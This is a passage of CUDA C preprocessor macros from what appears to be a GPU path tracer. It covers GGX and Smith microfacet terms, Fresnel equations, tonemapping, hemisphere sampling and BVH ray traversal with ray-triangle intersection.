\ float sin_theta_2; \ SIN_THETA_2(V, sin_theta_2); \ float inv_sin_theta_2 = 1.0f / sin_theta_2; \ if ((ROUGHNESS[0] == ROUGHNESS[1]) || (inv_sin_theta_2 <= 0.0f)) { \ R = ROUGHNESS[0]; \ } else { \ float cos_phi_2 = V[0] * V[0] * inv_sin_theta_2; \ float sin_phi_2 = V[1] * V[1] * inv_sin_theta_2; \ R = sqrt(cos_phi_2 * ROUGHNESS[0] * ROUGHNESS[0] + \ sin_phi_2 * ROUGHNESS[1] * ROUGHNESS[1]); \ } \ } /// #define HYPOT_2(A, B, R) \ { \ if (fabs(A) > fabs(B)) { \ R = B / A; \ R = fabs(A) * sqrt(1.0f + R * R); \ } else if (B != 0.0f) { \ R = A / B; \ R = fabs(B) * sqrt(1.0f + R * R); \ } else {\ R = 0.0f; \ } \ } /// #define SMITH_G1(V, N, ROUGHNESS, G1) \ { \ if ((DOT(N, V) * V[2]) <= 0.0f) { \ G1 = 0.0f; \ } else { \ float tan_theta; \ TAN_THETA(V, tan_theta); \ tan_theta = fabs(tan_theta); \ if (tan_theta == 0.0f) { \ G1 = 1.0f; \ } else { \ float alpha; \ PROJECT_ROUGHNESS(V, ROUGHNESS, alpha); \ float root = alpha * tan_theta; \ float hypot_2; \ HYPOT_2(1.0f, root, hypot_2); \ G1 = 2.0f / (1.0f + hypot_2); \ } \ } \ } /// #define GGX_EVAL(N, ROUGHNESS, R) \ { \ if (N[2] <= 0.0f) { \ R = 0.0f; \ } else { \ float cos_theta_2 = N[2] * N[2]; \ float exponent = ((N[0] * N[0]) / (ROUGHNESS[0] * ROUGHNESS[0]) + \ (N[1] * N[1]) / (ROUGHNESS[1] * ROUGHNESS[1])) / cos_theta_2; \ float root = (1.0f + exponent) * cos_theta_2; \ R = 1.0f / (PI * ROUGHNESS[0] * ROUGHNESS[1] * root * root); \ } \ } /// #define AVG_TONEMAP(RGB) \ { \ RGB[0] *= inv_sample_count; \ RGB[1] *= inv_sample_count; \ RGB[2] *= inv_sample_count; \ RGB[0] *= image_properties.exposure + 2.0f; \ RGB[1] *= image_properties.exposure + 2.0f; \ RGB[2] *= image_properties.exposure + 2.0f; \ if (image_properties.tonemap) { \ RGB[0] = ((RGB[0] * (0.15f * RGB[0] + 0.10f * 0.5f) + 0.20f * 0.02f) / \ (RGB[0] * (0.15f * RGB[0] + 0.5f) + 0.2f * 0.3f)) - (0.02f / 0.3f); \ RGB[1] = ((RGB[1] * (0.15f * RGB[1] + 0.10f * 0.5f) + 0.20f * 0.02f) / \ (RGB[1] * (0.15f * RGB[1] + 0.5f) + 0.2f * 0.3f)) - (0.02f / 0.3f); \ RGB[2] = ((RGB[2] * (0.15f * RGB[2] + 0.10f * 0.5f) + 0.20f * 0.02f) / \ (RGB[2] * (0.15f * RGB[2] + 0.5f) + 0.2f * 0.3f)) - (0.02f / 0.3f); \ float whitescale = 11.2f; \ whitescale = ((whitescale * (0.15f * whitescale + 0.10f * 0.5f) + \ 0.20f * 0.02f) / (whitescale * (0.15f * whitescale + 0.5f) + \ 0.2f * 0.3f)) - (0.02f / 0.3f); \ whitescale = 1.0f / whitescale; \ RGB[0] *= whitescale; \ RGB[1] *= whitescale; \ RGB[2] *= whitescale; \ } \ RGB[0] = pow(RGB[0], 1.0f / image_properties.gamma); \ RGB[1] = pow(RGB[1], 1.0f / image_properties.gamma); \ RGB[2] = pow(RGB[2], 1.0f / image_properties.gamma); \ } /// #define MIS(A, B) ((A * A) / (A * A + B * B)) /// #define CONCENTRIC_HEMI(R0, R1, D) \ { \ R0 = 2.0f * R0 - 1.0f; \ R1 = 2.0f * R1 - 1.0f; \ float phi, r; \ if (R0 == 0.0f && R1 == 0.0f) { \ r = phi = 0.0f; \ } else if ((R0 * R0) > (R1 * R1)) { \ r = R0; \ phi = (PI * 0.25f) * (R1 / (R0)); \ } else { \ r = R1; \ phi = (PI * 0.5f) - (R0 / (R1)) * (PI * 0.25f); \ } \ float cos_phi = cos(phi); \ float sin_phi = sin(phi); \ D[0] = r * cos_phi; \ D[1] = r * sin_phi; \ D[2] = sqrt(fmax(0.0f, 1.0f - D[0] * D[0] - D[1] * D[1])); \ NORMALIZE(D); \ } /// #define GET_BASIS(N, T, B) \ {\ float z = 1.0f + N[2]; \ float a = 1.0f / NOT_ZERO(z); \ float b = -N[0] * N[1] * a; \ T[0] = 1.0f - N[0] * N[0] * a; \ T[1] = b; \ T[2] = -N[0]; \ B[0] = b; \ B[1] = 1.0f - N[1] * N[1] * a; \ B[2] = -N[1]; \ } /// #define GET_VT_BASIS(N, T, B) \ {\ float flip_binormal; \ if (use_triangles_image) { \ T[0] = w * tex1Dfetch<float>(triangles_image, TRI_VT_0) + \ u * tex1Dfetch<float>(triangles_image, TRI_VT_1) + \ v * tex1Dfetch<float>(triangles_image, TRI_VT_2); \ T[1] = w * tex1Dfetch<float>(triangles_image, TRI_VT_0 + 1) + \ u * tex1Dfetch<float>(triangles_image, TRI_VT_1 + 1) + \ v * tex1Dfetch<float>(triangles_image, TRI_VT_2 + 1); \ T[2] = w * tex1Dfetch<float>(triangles_image, TRI_VT_0 + 2) + \ u * tex1Dfetch<float>(triangles_image, TRI_VT_1 + 2) + \ v * tex1Dfetch<float>(triangles_image, TRI_VT_2 + 2); \ flip_binormal = w * tex1Dfetch<float>(triangles_image, TRI_VT_0 + 3) + \ u * tex1Dfetch<float>(triangles_image, TRI_VT_1 + 3) + \ v * tex1Dfetch<float>(triangles_image, TRI_VT_2 + 3); \ } else { \ T[0] = w * triangles[tri_index].vertex_tangents[0][0] + \ u * triangles[tri_index].vertex_tangents[1][0] + \ v * triangles[tri_index].vertex_tangents[2][0]; \ T[1] = w * triangles[tri_index].vertex_tangents[0][1] + \ u * triangles[tri_index].vertex_tangents[1][1] + \ v * triangles[tri_index].vertex_tangents[2][1]; \ T[2] = w * triangles[tri_index].vertex_tangents[0][2] + \ u * triangles[tri_index].vertex_tangents[1][2] + \ v * triangles[tri_index].vertex_tangents[2][2]; \ flip_binormal = w * triangles[tri_index].vertex_tangents[0][3] + \ u * triangles[tri_index].vertex_tangents[1][3] + \ v * triangles[tri_index].vertex_tangents[2][3]; \ } \ CROSS(N, T, B); \ if (flip_binormal < 0.0f) { \ B[0] = -B[0]; \ B[1] = -B[1]; \ B[2] = -B[2]; \ } \ } /// #define RELATIVE_TO_BASIS(V, N, T, B, D) \ {\ D[0] = DOT(V, T); \ D[1] = DOT(V, B); \ D[2] = DOT(V, N); \ } /// #define ROTATE_TO_BASIS(V, N, T, B, D) \ {\ D[0] = V[0] * T[0] + V[1] * B[0] + V[2] * N[0]; \ D[1] = V[0] * T[1] + V[1] * B[1] + V[2] * N[1]; \ D[2] = V[0] * T[2] + V[1] * B[2] + V[2] * N[2]; \ } /// #define CONDUCTOR_FRESNEL(I, IOR, K, F) \ { \ float cos_theta_2 = I * I; \ float temp = (IOR * IOR + K * K) * cos_theta_2; \ float rp2 = (temp - (IOR * (2.0f * I)) + 1.0f) / \ (temp + (IOR * (2.0f * I)) + 1.0f); \ float tempf = IOR * IOR + K * K; \ float rs2 = (tempf - (IOR * (2.0f * I)) + cos_theta_2) / \ (tempf + (IOR * (2.0f * I)) + cos_theta_2); \ F = 0.5f * (rp2 + rs2); \ } /// #define DIELECTRIC_FRESNEL(I, IOR, COS_THETA_T, F) \ { \ float scale = (I > 0.0f) ? 1.0f / IOR : IOR; \ float cos_theta_t2 = 1.0f - (1.0f - I * I) * (scale * scale); \ if (cos_theta_t2 < 0.0f) { \ COS_THETA_T = 0.0f; \ F = 1.0f; \ } else { \ float cos_theta_i = fabs(I); \ float _cos_theta_t = sqrt(cos_theta_t2); \ float rs = (cos_theta_i - IOR * _cos_theta_t) / \ (cos_theta_i + IOR * _cos_theta_t); \ float rp = (IOR * cos_theta_i - _cos_theta_t) / \ (IOR * cos_theta_i + _cos_theta_t); \ COS_THETA_T = (I > 0.0f) ? -_cos_theta_t : _cos_theta_t; \ F = 0.5f * (rs * rs + rp * rp); \ } \ } /// #define TRACE(USE_NODES_IMAGE, USE_TRIANGLES_IMAGE, PRIMARY_RAY) \ { \ float id[3], ood[3]; \ id[0] = 1.0f / NOT_ZERO(d[0]); \ id[1] = 1.0f / NOT_ZERO(d[1]); \ id[2] = 1.0f / NOT_ZERO(d[2]); \ ood[0] = o[0] * id[0]; \ ood[1] = o[1] * id[1]; \ ood[2] = o[2] * id[2]; \ int32_t h_tri_index = NO_TRI_HIT; \ int32_t h_material_type; \ float h_u, h_v; \ float h_t = FLT_MAX; \ uint32_t top_tree_height; \ if (USE_NODES_IMAGE) { \ uint32_t node_pixel = (top_tree_offset << 4); \ top_tree_height = tex1Dfetch<uint32_t>(nodes_image, \ NODE_EXTRA_0); \ } else { \ top_tree_height = nodes[top_tree_offset].extra[0]; \ } \ uint32_t tree_height = top_tree_height; \ uint32_t tree_offset = top_tree_offset; \ uint32_t node_offset = 0; \ uint32_t trail = 0x0; \ uint32_t key = 0x0; \ uint32_t level_bit = 0x1 << (top_tree_height - 1); \ uint32_t hit_leaf = TREE_NO_LEAF_HIT; \ uint32_t mesh_triangle_offset = 0; \ uint32_t hit_mask = HM_TEST_NODES; \ while (true) { \ while (hit_leaf >= TREE_NO_LEAF_HIT) { \ uint32_t node_index = node_offset + tree_offset; \ uint32_t node_pixel = (node_index << 4); \ if (level_bit == LB_NEW_SUB_TREE) { \ if (USE_NODES_IMAGE) { \ tree_height = tex1Dfetch<uint32_t>(nodes_image, \ NODE_EXTRA_0); \ mesh_triangle_offset = tex1Dfetch<uint32_t>(nodes_image, \ NODE_EXTRA_1); \ } else { \ tree_height = nodes[node_index].extra[0]; \ mesh_triangle_offset = nodes[node_index].extra[1]; \ } \ trail <<= tree_height; \ key <<= tree_height; \ level_bit = 0x1 << (tree_height - 1); \ } \ if (hit_mask == HM_TEST_NODES) { \ float l_bounds[6], r_bounds[6]; \ if (USE_NODES_IMAGE) { \ l_bounds[0] = tex1Dfetch<float>(nodes_image, NODE_L_BOUNDS); \ l_bounds[1] = tex1Dfetch<float>(nodes_image, NODE_L_BOUNDS + 1); \ l_bounds[2] = tex1Dfetch<float>(nodes_image, NODE_L_BOUNDS + 2); \ l_bounds[3] = tex1Dfetch<float>(nodes_image, NODE_L_BOUNDS + 3); \ l_bounds[4] = tex1Dfetch<float>(nodes_image, NODE_L_BOUNDS + 4); \ l_bounds[5] = tex1Dfetch<float>(nodes_image, NODE_L_BOUNDS + 5); \ r_bounds[0] = tex1Dfetch<float>(nodes_image, NODE_R_BOUNDS); \ r_bounds[1] = tex1Dfetch<float>(nodes_image, NODE_R_BOUNDS + 1); \ r_bounds[2] = tex1Dfetch<float>(nodes_image, NODE_R_BOUNDS + 2); \ r_bounds[3] = tex1Dfetch<float>(nodes_image, NODE_R_BOUNDS + 3); \ r_bounds[4] = tex1Dfetch<float>(nodes_image, NODE_R_BOUNDS + 4); \ r_bounds[5] = tex1Dfetch<float>(nodes_image, NODE_R_BOUNDS + 5); \ } else { \ l_bounds[0] = nodes[node_index].l_bounds[0]; \ l_bounds[1] = nodes[node_index].l_bounds[1]; \ l_bounds[2] = nodes[node_index].l_bounds[2]; \ l_bounds[3] = nodes[node_index].l_bounds[3]; \ l_bounds[4] = nodes[node_index].l_bounds[4]; \ l_bounds[5] = nodes[node_index].l_bounds[5]; \ r_bounds[0] = nodes[node_index].r_bounds[0]; \ r_bounds[1] = nodes[node_index].r_bounds[1]; \ r_bounds[2] = nodes[node_index].r_bounds[2]; \ r_bounds[3] = nodes[node_index].r_bounds[3]; \ r_bounds[4] = nodes[node_index].r_bounds[4]; \ r_bounds[5] = nodes[node_index].r_bounds[5]; \ } \ float l_lo[3], l_hi[3]; \ l_lo[0] = l_bounds[0] * id[0] - ood[0]; \ l_lo[1] = l_bounds[1] * id[1] - ood[1]; \ l_lo[2] = l_bounds[2] * id[2] - ood[2]; \ l_hi[0] = l_bounds[3] * id[0] - ood[0]; \ l_hi[1] = l_bounds[4] * id[1] - ood[1]; \ l_hi[2] = l_bounds[5] * id[2] - ood[2]; \ float r_lo[3], r_hi[3]; \ r_lo[0] = r_bounds[0] * id[0] - ood[0]; \ r_lo[1] = r_bounds[1] * id[1] - ood[1]; \ r_lo[2] = r_bounds[2] * id[2] - ood[2]; \ r_hi[0] = r_bounds[3] * id[0] - ood[0]; \ r_hi[1] = r_bounds[4] * id[1] - ood[1]; \ r_hi[2] = r_bounds[5] * id[2] - ood[2]; \ float l_near = fmax(fmax(fmax(fmin(l_lo[0], l_hi[0]),\ fmin(l_lo[1], l_hi[1])),\ fmin(l_lo[2], l_hi[2])), 0.0f); \ float l_far = fmin(fmin(fmax(l_lo[0], l_hi[0]),\ fmax(l_lo[1], l_hi[1])),\ fmax(l_lo[2], l_hi[2])); \ float r_near = fmax(fmax(fmax(fmin(r_lo[0], r_hi[0]),\ fmin(r_lo[1], r_hi[1])),\ fmin(r_lo[2], r_hi[2])), 0.0f); \ float r_far = fmin(fmin(fmax(r_lo[0], r_hi[0]),\ fmax(r_lo[1], r_hi[1])),\ fmax(r_lo[2], r_hi[2])); \ hit_mask = (((l_far >= l_near) && (l_near < h_t)) << 1) | \ ((r_far >= r_near) && (r_near < h_t)); \ if (hit_mask == HM_BOTH) { \ hit_mask = (l_near < r_near) + 1; \ trail |= level_bit; \ } \ } \ if (hit_mask == HM_TEST_NODES) { \ break; \ } \ if (hit_mask == HM_RIGHT) { \ key |= level_bit; \ node_offset += level_bit; \ } else { \ ++node_offset; \ } \ uint child = (hit_mask & 0x1); \ if (USE_NODES_IMAGE) { \ child = tex1Dfetch<uint32_t>(nodes_image, NODE_L + child); \ } else { \ child = nodes[node_index].child[child]; \ } \ hit_mask = HM_TEST_NODES; \ level_bit >>= 1; \ if (child & TREE_LEAF) { \ hit_leaf = (child & TREE_LEAF_MASK); \ break; \ } else if (child & TREE_SUB_TREE) { \ tree_offset = (child & TREE_SUB_TREE_MASK); \ level_bit = LB_NEW_SUB_TREE; \ node_offset = 0; \ } \ } \ if (hit_leaf != TREE_NO_LEAF_HIT) { \ uint tri_count = (hit_leaf >> (31 - TREE_LEAF_TRIANGLE_FACTOR)); \ uint tri_offset = mesh_triangle_offset + \ (hit_leaf & \ (TREE_LEAF_MASK >> TREE_LEAF_TRIANGLE_FACTOR)); \ for (uint32_t ti = tri_offset; ti <= tri_offset + tri_count; ++ti) { \ uint32_t tri_pixel = ti * 42; \ float vertex[3]; \ float edges[2][3]; \ float surface_normal[3]; \ if (USE_TRIANGLES_IMAGE) { \ vertex[0] = tex1Dfetch<float>(triangles_image, TRI_VERTEX); \ vertex[1] = tex1Dfetch<float>(triangles_image, TRI_VERTEX + 1); \ vertex[2] = tex1Dfetch<float>(triangles_image, TRI_VERTEX + 2); \ edges[0][0] = tex1Dfetch<float>(triangles_image, TRI_EDGES_0); \ edges[0][1] = tex1Dfetch<float>(triangles_image, TRI_EDGES_0 + 1); \ edges[0][2] = tex1Dfetch<float>(triangles_image, TRI_EDGES_0 + 2); \ edges[1][0] = tex1Dfetch<float>(triangles_image, TRI_EDGES_1); \ edges[1][1] = tex1Dfetch<float>(triangles_image, TRI_EDGES_1 + 1); \ edges[1][2] = tex1Dfetch<float>(triangles_image, TRI_EDGES_1 + 2); \ surface_normal[0] = tex1Dfetch<float>(triangles_image, \ TRI_SURF_N); \ surface_normal[1] = tex1Dfetch<float>(triangles_image, \ TRI_SURF_N + 1); \ surface_normal[2] = tex1Dfetch<float>(triangles_image, \ TRI_SURF_N + 2); \ } else { \ vertex[0] = triangles[ti].vertex[0]; \ vertex[1] = triangles[ti].vertex[1]; \ vertex[2] = triangles[ti].vertex[2]; \ edges[0][0] = triangles[ti].edges[0][0]; \ edges[0][1] = triangles[ti].edges[0][1]; \ edges[0][2] = triangles[ti].edges[0][2]; \ edges[1][0] = triangles[ti].edges[1][0]; \ edges[1][1] = triangles[ti].edges[1][1]; \ edges[1][2] = triangles[ti].edges[1][2]; \ surface_normal[0] = triangles[ti].surface_normal[0]; \ surface_normal[1] = triangles[ti].surface_normal[1]; \ surface_normal[2] = triangles[ti].surface_normal[2]; \ } \ float c[3], r[3]; \ c[0] = vertex[0] - o[0]; \ c[1] = vertex[1] - o[1]; \ c[2] = vertex[2] - o[2]; \ r[0] = (d[1] * c[2]) - (d[2] * c[1]); \ r[1] = (d[2] * c[0]) - (d[0] * c[2]); \ r[2] = (d[0] * c[1]) - (d[1] * c[0]); \ float u, v; \ u = r[0] * edges[1][0] + r[1] * edges[1][1] + \ r[2] * edges[1][2]; \ v = r[0] * edges[0][0] + r[1] * edges[0][1] + \ r[2] * edges[0][2]; \ float dot = DOT(-d, surface_normal); \ float t = c[0] * surface_normal[0] + \ c[1] * surface_normal[1] + \ c[2] * surface_normal[2]; \ float abs_dot = fabs(dot); \ float sign_dot = copysignf(1.0f, -dot); \ float rcp_dot = 1.0f / NOT_ZERO(abs_dot); \ u *= sign_dot; \ v *= sign_dot; \ t *= sign_dot * rcp_dot; \ if ((dot != 0.0f) && (u >= 0.0f) && (v >= 0.0f) && \ ((u + v) < abs_dot) && (t > 0.0f) && (t < h_t)) { \ uint32_t material_id = material_id; \ float vertex_uvs[3][2]; \ if (USE_TRIANGLES_IMAGE) { \ material_id = tex1Dfetch<uint32_t>(triangles_image, TRI_MAT_ID); \ vertex_uvs[0][0] = tex1Dfetch<float>(triangles_image, TRI_UV_0); \ vertex_uvs[0][1] = tex1Dfetch<float>(triangles_image, TRI_UV_0 + 1); \ vertex_uvs[1][0] = tex1Dfetch<float>(triangles_image, TRI_UV_1); \ vertex_uvs[1][1] = tex1Dfetch<float>(triangles_image, TRI_UV_1 + 1); \ vertex_uvs[2][0] = tex1Dfetch<float>(triangles_image, TRI_UV_2); \ vertex_uvs[2][1] = tex1Dfetch<float>(triangles_image, TRI_UV_2 + 1); \ } else {\ material_id = triangles[ti].material_id; \ vertex_uvs[0][0] = triangles[ti].vertex_uvs[0][0]; \ vertex_uvs[0][1] = triangles[ti].vertex_uvs[0][1]; \ vertex_uvs[1][0] = triangles[ti].vertex_uvs[1][0]; \ vertex_uvs[1][1] = triangles[ti].vertex_uvs[1][1]; \ vertex_uvs[2][0] = triangles[ti].vertex_uvs[2][0]; \ vertex_uvs[2][1] = triangles[ti].vertex_uvs[2][1]; \ } \ u *= rcp_dot; \ v *= rcp_dot; \ float w = 1.0f - u - v; \ float uv[2]; \ uv[0] = w * vertex_uvs[0][0] + u * vertex_uvs[1][0] + \ v * vertex_uvs[2][0]; \ uv[1] = w * vertex_uvs[0][1] + u * vertex_uvs[1][1] + \ v * vertex_uvs[2][1]; \ if ((materials[material_id].glass > 0.0f) || \ (materials[material_id].emission > 0.0f) || \ (materials[material_id].double_sided) || (dot > 0.0f)) { \ float alpha = 1.0f; \ float alpha_sample = 0.0f; \ float emission = materials[material_id].emission; \ if (materials[material_id].map_flags & MAP_FLAG_EMISSION) { \ float2 emission_uv; \ emission_uv.x = uv[0]; \ emission_uv.y = uv[1]; \ emission_uv.x = \ lerp(materials[material_id].emission_bounds[0] + 0.5f, \ materials[material_id].emission_bounds[1] - 0.5f, \ emission_uv.x); \ emission_uv.y = \ lerp(materials[material_id].emission_bounds[2] + 0.5f, \ materials[material_id].emission_bounds[3] - 0.5f, \ emission_uv.y); \ float4 emission_map = tex2D<float4>(emission_atlas, emission_uv.x, \ emission_uv.y); \ emission *= fmax(fmax(emission_map.y, emission_map.z), \ emission_map.w); \ } \ if (emission == 0.0f) { \ alpha = materials[material_id].albedo[3]; \ PRNG(global_id, b_seeds.w, alpha_sample); \ if (materials[material_id].map_flags & MAP_FLAG_ALBEDO) { \ float2 albedo_uv; \ albedo_uv.x = uv[0]; \ albedo_uv.y = uv[1]; \ albedo_uv.x = \ lerp(materials[material_id].albedo_bounds[0] + 0.5f, \ materials[material_id].albedo_bounds[1] - 0.5f, \ albedo_uv.x); \ albedo_uv.y = \ lerp(materials[material_id].albedo_bounds[2] + 0.5f, \ materials[material_id].albedo_bounds[3] - 0.5f, \ albedo_uv.y); \ float4 albedo_map = tex2D<float4>(albedo_atlas, albedo_uv.x, \ albedo_uv.y); \ alpha *= albedo_map.x; \ } \ } \ if (alpha_sample < alpha) { \ h_t = t; \ h_u = u; \ h_v = v; \ if (emission > 0.0f) { \ h_material_type = STATE_EMISSIVE; \ } else { \ h_material_type = STATE_MATERIAL; \ } \ h_tri_index = ti; \ } \ } \ } \ } \ hit_leaf = TREE_NO_LEAF_HIT; \ } \ if (trail == 0x0) { \ break; \ } \ uint32_t shift = 31 - __clz(trail & -trail); \ if (shift >= tree_height) { \ shift -= tree_height; \ trail >>= tree_height; \ key >>= tree_height; \ tree_height = top_tree_height; \ tree_offset = top_tree_offset; \ mesh_triangle_offset = 0; \ } \ level_bit = (0x1 << shift); \ hit_mask = ((key & level_bit) > 0) + 1; \ trail ^= level_bit; \ key = (key & (0xFFFFFFFF << (shift + 1))); \ uint32_t local_key = key & (0xFFFFFFFF >> (32 - tree_height)); \ node_offset = local_key + ((32 - __popc(local_key)) - \ (32 - tree_height) - (shift + 1)); \ } \ ray_state[RS_DIR_X] = d[0]; \ ray_state[RS_DIR_Y] = d[1]; \ ray_state[RS_DIR_Z] = d[2]; \ if (h_tri_index != NO_TRI_HIT) {\ ray_state[RS_STATE] = h_material_type; \ o[0] += d[0] * h_t; \ o[1] += d[1] * h_t; \ o[2] += d[2] * h_t; \ ray_state[RS_ORIGIN_X] = o[0]; \ ray_state[RS_ORIGIN_Y] = o[1]; \ ray_state[RS_ORIGIN_Z] = o[2]; \ ray_state[RS_U] = h_u; \ ray_state[RS_V] = h_v; \ ray_state[RS_HIT_DISTANCE] = h_t; \ ray_state[RS_TRI_INDEX] = h_tri_index; \ } else {\ ray_state[RS_STATE] = STATE_ENVIRONMENT; \ }\ } /// #define OCCLUSION(O, D, USE_NODES_IMAGE, USE_TRIANGLES_IMAGE) \ { \ float id[3], ood[3]; \ id[0] = 1.0f / NOT_ZERO(D[0]); \ id[1] = 1.0f / NOT_ZERO(D[1]); \ id[2] = 1.0f / NOT_ZERO(D[2]); \ ood[0] = O[0] * id[0]; \ ood[1] = O[1] * id[1]; \ ood[2] = O[2] * id[2]; \ uint32_t top_tree_height; \ if (USE_NODES_IMAGE) { \ uint32_t node_pixel = (top_tree_offset << 4); \ top_tree_height = tex1Dfetch<uint32_t>(nodes_image, \ NODE_EXTRA_0); \ } else { \ top_tree_height = nodes[top_tree_offset].extra[0]; \ } \ uint32_t tree_height = top_tree_height; \ uint32_t tree_offset = top_tree_offset; \ uint32_t node_offset = 0; \ uint32_t trail = 0x0; \ uint32_t key = 0x0; \ uint32_t level_bit = 0x1 << (top_tree_height - 1); \ uint32_t hit_leaf = TREE_NO_LEAF_HIT; \ uint32_t mesh_triangle_offset = 0; \ uint32_t hit_mask = HM_TEST_NODES; \ while (true) { \ while (hit_leaf >= TREE_NO_LEAF_HIT) { \ uint32_t node_index = node_offset + tree_offset; \ uint32_t node_pixel = (node_index << 4); \ if (level_bit == LB_NEW_SUB_TREE) { \ if (USE_NODES_IMAGE) { \ tree_height = tex1Dfetch<uint32_t>(nodes_image, \ NODE_EXTRA_0); \ mesh_triangle_offset = tex1Dfetch<uint32_t>(nodes_image, \ NODE_EXTRA_1); \ } else { \ tree_height = nodes[node_index].extra[0]; \ mesh_triangle_offset = nodes[node_index].extra[1]; \ } \ trail <<= tree_height; \ key <<= tree_height; \ level_bit = 0x1 << (tree_height - 1); \ } \ if (hit_mask == HM_TEST_NODES) { \ float l_bounds[6], r_bounds[6]; \ if (USE_NODES_IMAGE) { \ l_bounds[0] = tex1Dfetch<float>(nodes_image, NODE_L_BOUNDS); \ l_bounds[1] = tex1Dfetch<float>(nodes_image, NODE_L_BOUNDS + 1); \ l_bounds[2] = tex1Dfetch<float>(nodes_image, NODE_L_BOUNDS + 2); \ l_bounds[3] = tex1Dfetch<float>(nodes_image, NODE_L_BOUNDS + 3); \ l_bounds[4] = tex1Dfetch<float>(nodes_image, NODE_L_BOUNDS + 4); \ l_bounds[5] = tex1Dfetch<float>(nodes_image, NODE_L_BOUNDS + 5); \ r_bounds[0] = tex1Dfetch<float>(nodes_image, NODE_R_BOUNDS); \ r_bounds[1] = tex1Dfetch<float>(nodes_image, NODE_R_BOUNDS + 1); \ r_bounds[2] = tex1Dfetch<float>(nodes_image, NODE_R_BOUNDS + 2); \ r_bounds[3] = tex1Dfetch<float>(nodes_image, NODE_R_BOUNDS + 3); \ r_bounds[4] = tex1Dfetch<float>(nodes_image, NODE_R_BOUNDS + 4); \ r_bounds[5] = tex1Dfetch<float>(nodes_image, NODE_R_BOUNDS + 5); \ } else { \ l_bounds[0] = nodes[node_index].l_bounds[0]; \ l_bounds[1] = nodes[node_index].l_bounds[1]; \ l_bounds[2] = nodes[node_index].l_bounds[2]; \ l_bounds[3] = nodes[node_index].l_bounds[3]; \ l_bounds[4] = nodes[node_index].l_bounds[4]; \ l_bounds[5] = nodes[node_index].l_bounds[5]; \ r_bounds[0] = nodes[node_index].r_bounds[0]; \ r_bounds[1] = nodes[node_index].r_bounds[1]; \ r_bounds[2] = nodes[node_index].r_bounds[2]; \ r_bounds[3] = nodes[node_index].r_bounds[3]; \ r_bounds[4] = nodes[node_index].r_bounds[4]; \ r_bounds[5] = nodes[node_index].r_bounds[5]; \ } \ float l_lo[3], l_hi[3]; \ l_lo[0] = l_bounds[0] * id[0] - ood[0]; \ l_lo[1] = l_bounds[1] * id[1] - ood[1]; \ l_lo[2] = l_bounds[2] * id[2] - ood[2]; \ l_hi[0] = l_bounds[3] * id[0] - ood[0]; \ l_hi[1] = l_bounds[4] * id[1] - ood[1]; \ l_hi[2] = l_bounds[5] * id[2] - ood[2]; \ float r_lo[3], r_hi[3]; \ r_lo[0] = r_bounds[0] * id[0] - ood[0]; \ r_lo[1] = r_bounds[1] * id[1] - ood[1]; \ r_lo[2] = r_bounds[2] * id[2] - ood[2]; \ r_hi[0] = r_bounds[3] * id[0] - ood[0]; \ r_hi[1] = r_bounds[4] * id[1] - ood[1]; \ r_hi[2] = r_bounds[5] * id[2] - ood[2]; \ float l_near = fmax(fmax(fmax(fmin(l_lo[0], l_hi[0]),\ fmin(l_lo[1], l_hi[1])),\ fmin(l_lo[2], l_hi[2])), 0.0f); \ float l_far = fmin(fmin(fmax(l_lo[0], l_hi[0]),\ fmax(l_lo[1], l_hi[1])),\ fmax(l_lo[2], l_hi[2])); \ float r_near = fmax(fmax(fmax(fmin(r_lo[0], r_hi[0]),\ fmin(r_lo[1], r_hi[1])),\ fmin(r_lo[2], r_hi[2])), 0.0f); \ float r_far = fmin(fmin(fmax(r_lo[0], r_hi[0]),\ fmax(r_lo[1], r_hi[1])),\ fmax(r_lo[2], r_hi[2])); \ hit_mask = (((l_far >= l_near) && (l_near < h_t)) << 1) | \ ((r_far >= r_near) && (r_near < h_t)); \ if (hit_mask == HM_BOTH) { \ hit_mask = (l_near < r_near) + 1; \ trail |= level_bit; \ } \ } \ if (hit_mask == HM_TEST_NODES) { \ break; \ } \ if (hit_mask == HM_RIGHT) { \ key |= level_bit; \ node_offset += level_bit; \ } else { \ ++node_offset; \ } \ uint child = (hit_mask & 0x1); \ if (USE_NODES_IMAGE) { \ child = tex1Dfetch<uint32_t>(nodes_image, NODE_L + child); \ } else { \ child = nodes[node_index].child[child]; \ } \ hit_mask = HM_TEST_NODES; \ level_bit >>= 1; \ if (child & TREE_LEAF) { \ hit_leaf = (child & TREE_LEAF_MASK); \ break; \ } else if (child & TREE_SUB_TREE) { \ tree_offset = (child & TREE_SUB_TREE_MASK); \ level_bit = LB_NEW_SUB_TREE; \ node_offset = 0; \ } \ } \ if (hit_leaf != TREE_NO_LEAF_HIT) { \ uint tri_count = (hit_leaf >> (31 - TREE_LEAF_TRIANGLE_FACTOR)); \ uint tri_offset = mesh_triangle_offset + \ (hit_leaf & \ (TREE_LEAF_MASK >> TREE_LEAF_TRIANGLE_FACTOR)); \ for (uint32_t ti = tri_offset; ti <= tri_offset + tri_count; ++ti) { \ uint32_t tri_pixel = ti * 42; \ float vertex[3]; \ float edges[2][3]; \ float surface_normal[3]; \ if (USE_TRIANGLES_IMAGE) { \ vertex[0] = tex1Dfetch<float>(triangles_image, TRI_VERTEX); \ vertex[1] = tex1Dfetch<float>(triangles_image, TRI_VERTEX + 1); \ vertex[2] = tex1Dfetch<float>(triangles_image, TRI_VERTEX + 2); \ edges[0][0] = tex1Dfetch<float>(triangles_image, TRI_EDGES_0); \ edges[0][1] = tex1Dfetch<float>(triangles_image, TRI_EDGES_0 + 1); \ edges[0][2] = tex1Dfetch<float>(triangles_image, TRI_EDGES_0 + 2); \ edges[1][0] = tex1Dfetch<float>(triangles_image, TRI_EDGES_1); \ edges[1][1] = tex1Dfetch<float>(triangles_image, TRI_EDGES_1 + 1); \ edges[1][2] = tex1Dfetch<float>(triangles_image, TRI_EDGES_1 + 2); \ surface_normal[0] = tex1Dfetch<float>(triangles_image, TRI_SURF_N); \ surface_normal[1] = tex1Dfetch<float>(triangles_image, TRI_SURF_N + 1); \ surface_normal[2] = tex1Dfetch<float>(triangles_image, TRI_SURF_N + 2); \ } else { \ vertex[0] = triangles[ti].vertex[0]; \ vertex[1] = triangles[ti].vertex[1]; \ vertex[2] = triangles[ti].vertex[2]; \ edges[0][0] = triangles[ti].edges[0][0]; \ edges[0][1] = triangles[ti].edges[0][1]; \ edges[0][2] = triangles[ti].edges[0][2]; \ edges[1][0] = triangles[ti].edges[1][0]; \ edges[1][1] = triangles[ti].edges[1][1]; \ edges[1][2] = triangles[ti].edges[1][2]; \ surface_normal[0] = triangles[ti].surface_normal[0]; \ surface_normal[1] = triangles[ti].surface_normal[1]; \ 